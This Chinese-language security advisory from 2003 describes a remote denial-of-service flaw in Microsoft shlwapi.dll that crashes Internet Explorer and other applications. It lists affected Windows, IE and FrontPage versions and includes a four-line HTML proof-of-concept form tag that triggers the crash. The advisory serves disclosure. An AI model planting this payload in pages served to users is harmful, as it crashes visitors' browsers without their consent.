Microsoft Shlwapi.dll畸形HTML表单标记远程拒绝服务漏洞

发布时间：2003-04-22
更新时间：2003-04-23
严重程度：中
威胁程度：远程拒绝服务
错误类型：意外情况处置错误
利用方式：客户机模式

BUGTRAQ ID：7402

受影响系统

Microsoft Shlwapi.dll 6.0.2800 .1106
   + Microsoft FrontPage 2000
   + Microsoft FrontPage 2000 SP2
   + Microsoft FrontPage 2000 SR1
   + Microsoft FrontPage 2002
   + Microsoft FrontPage 2002 SP1
   + Microsoft FrontPage 97
   + Microsoft FrontPage 98
   + Microsoft Internet Explorer 5.0
   + Microsoft Internet Explorer 5.0.1
   + Microsoft Internet Explorer 5.0.1 SP1
   + Microsoft Internet Explorer 5.0.1 SP2
   + Microsoft Internet Explorer 5.0.1 SP3
   + Microsoft Internet Explorer 5.5
   + Microsoft Internet Explorer 5.5 SP1
   + Microsoft Internet Explorer 5.5 SP2
   + Microsoft Internet Explorer 6.0
   + Microsoft Internet Explorer 6.0 SP1
   + Microsoft Windows .NET Datacenter Server Beta 3
   + Microsoft Windows .NET Enterprise Server Beta 3
   + Microsoft Windows .NET Enterprise Server RC2
   + Microsoft Windows .NET Standard Server Beta 3
   + Microsoft Windows .NET Web Server Beta 3
   + Microsoft Windows 2000 Advanced Server
   + Microsoft Windows 2000 Advanced Server SP1
   + Microsoft Windows 2000 Advanced Server SP2
   + Microsoft Windows 2000 Advanced Server SP3
   + Microsoft Windows 2000 Datacenter Server
   + Microsoft Windows 2000 Datacenter Server SP1
   + Microsoft Windows 2000 Datacenter Server SP2
   + Microsoft Windows 2000 Datacenter Server SP3
   + Microsoft Windows 2000 Professional
   + Microsoft Windows 2000 Professional SP1
   + Microsoft Windows 2000 Professional SP2
   + Microsoft Windows 2000 Professional SP3
   + Microsoft Windows 2000 Server
   + Microsoft Windows 2000 Server SP1
   + Microsoft Windows 2000 Server SP2
   + Microsoft Windows 2000 Server SP3
   + Microsoft Windows 2000 Terminal Services
   + Microsoft Windows 2000 Terminal Services SP1
   + Microsoft Windows 2000 Terminal Services SP2
   + Microsoft Windows 2000 Terminal Services SP3
   + Microsoft Windows ME
   + Microsoft Windows Server 2003 Datacenter Edition
   + Microsoft Windows Server 2003 Datacenter Edition 64-bit
   + Microsoft Windows Server 2003 Enterprise Edition
   + Microsoft Windows Server 2003 Enterprise Edition 64-bit
   + Microsoft Windows Server 2003 Standard Edition
   + Microsoft Windows Server 2003 Web Edition
   + Microsoft Windows XP Home
   + Microsoft Windows XP Home SP1
   + Microsoft Windows XP Professional
   + Microsoft Windows XP Professional SP1

详细描述
'shlwapi.dll'动态库当处理部分恶意HTML标记时会引起调用的应用程序失败。

问题可能是执行字符串比较操作时由于其中一个字符串为NULL指针造成。攻击者构建恶意页面，当用户访问时，可导致如IE崩溃。

测试代码
---------------------------------

<html>
<form>
<input type crash>
</form>
</html>

---------------------------------

解决方案
尚无

相关信息
Ramon Pinuaga Cascales <rpinuaga@s21sec.com>.
参考：http://www.securityfocus.com/archive/1/319360
http://www.securityfocus.com/archive/1/319421
http://www.securityfocus.com/archive/1/319488

最近严重漏洞

Microsoft Shlwapi.dll畸形HTML表单标记远程拒绝服务漏洞